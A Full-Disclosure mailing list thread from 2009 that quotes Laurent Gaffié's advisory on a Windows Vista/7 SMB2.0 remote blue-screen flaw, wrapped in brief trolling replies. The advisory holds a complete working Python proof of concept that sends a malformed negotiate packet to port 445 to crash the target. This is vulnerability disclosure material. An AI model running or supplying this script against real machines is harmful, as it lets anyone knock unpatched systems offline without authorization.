n3td3v works for micro$ucks, go figure On Thu, Sep 10, 2009 at 6:56 AM, James Matthews <nytrok...@gmail.com> wrote:
> So Msoft! why can't they just stop reintroducing bugs? > > > On Wed, Sep 9, 2009 at 11:04 AM, <random...@hushmail.com> wrote: > >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA1 >> >> How come all I hear about is n3td3v, and I see noone crying out >> lout about this : >> http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&ta >> sk=show&action=view&id=64&Itemid=15<http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&ta%0Ask=show&action=view&id=64&Itemid=15> >> >> is fd all 'bout trolls nao? >> >> - -- >> ============================================= >> - - Release date: September 7th, 2009 >> - - Discovered by: Laurent GaffiƩ >> - - Severity: Medium/High >> ============================================= >> >> I. VULNERABILITY >> - ------------------------- >> Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. >> >> II. BACKGROUND >> - ------------------------- >> Windows vista and newer Windows comes with a new SMB version named >> SMB2. >> See: >> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S >> erver_Message_Block_2.0 >> for more details. >> >> III. DESCRIPTION >> - ------------------------- >> SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE >> PROTOCOL REQUEST functionnality. >> The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send >> to a SMB server, and it's used >> to identify the SMB dialect that will be used for futher >> communication. >> >> IV. PROOF OF CONCEPT >> - ------------------------- >> >> Smb-Bsod.py: >> >> #!/usr/bin/python >> # When SMB2.0 recieve a "&" char in the "Process Id High" SMB >> header field it dies with a >> # PAGE_FAULT_IN_NONPAGED_AREA >> >> from socket import socket >> from time import sleep >> >> host = "IP_ADDR", 445 >> buff = ( >> "\x00\x00\x00\x90" # Begin SMB header: Session message >> "\xff\x53\x4d\x42" # Server Component: SMB >> "\x72\x00\x00\x00" # Negociate Protocol >> "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 >> "\x00\x26"# Process ID High: --> :) normal value should be >> "\x00\x00" >> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" >> "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" >> "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" >> "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" >> "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" >> "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" >> "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" >> "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" >> "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" >> "\x30\x30\x32\x00" >> ) >> s = socket() >> s.connect(host) >> s.send(buff) >> s.close() >> >> V. BUSINESS IMPACT >> - ------------------------- >> An attacker can remotly crash without no user interaction, any >> Vista/Windows 7 machine with SMB enable. >> Windows Xp, 2k, are NOT affected as they dont have this driver. >> >> VI. SYSTEMS AFFECTED >> - ------------------------- >> Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly >> Win Server 2008 >> as it use the same SMB2.0 driver (not tested). >> >> VII. SOLUTION >> - ------------------------- >> Vendor contacted, but no patch available for the moment. >> Close SMB feature and ports, until a patch is provided. >> >> VIII. REFERENCES >> - ------------------------- >> http://microsoft.com >> >> IX. CREDITS >> - ------------------------- >> This vulnerability has been discovered by Laurent GaffiƩ >> Laurent.gaffie{remove-this}(at)gmail.com >> http://g-laurent.blogspot.com/ >> >> X. LEGAL NOTICES >> - ------------------------- >> The information contained within this advisory is supplied "as-is" >> with no warranties or guarantees of fitness of use or otherwise. >> I accept no responsibility for any damage caused by the use or >> misuse of this information. >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> -----BEGIN PGP SIGNATURE----- >> Charset: UTF8 >> Note: This signature can be verified at https://www.hushtools.com/verify >> Version: Hush 3.0 >> >> wpwEAQMCAAYFAkqnw/YACgkQRVBSp0SbIgeyMQQAoyMwFvi4CWq+2XUcoyIQUp/MxwBr >> mUbXX+BJYl6K9ydQqZDxnAwOi24VIBE/xRQcUFMhVH/Uk4zH9KAGzW7/gu3V8Yq0mHPL >> pCZ9+Lwml3mNeJOg6oZEyJUhmJTF2WcfXLnmjHbys0oShACWCXBAyqyMVQFdNSja9aeC >> 6kWcu5Q= >> =MjSD >> -----END PGP SIGNATURE----- >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > > > > -- > http://www.jewelerslounge.com > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/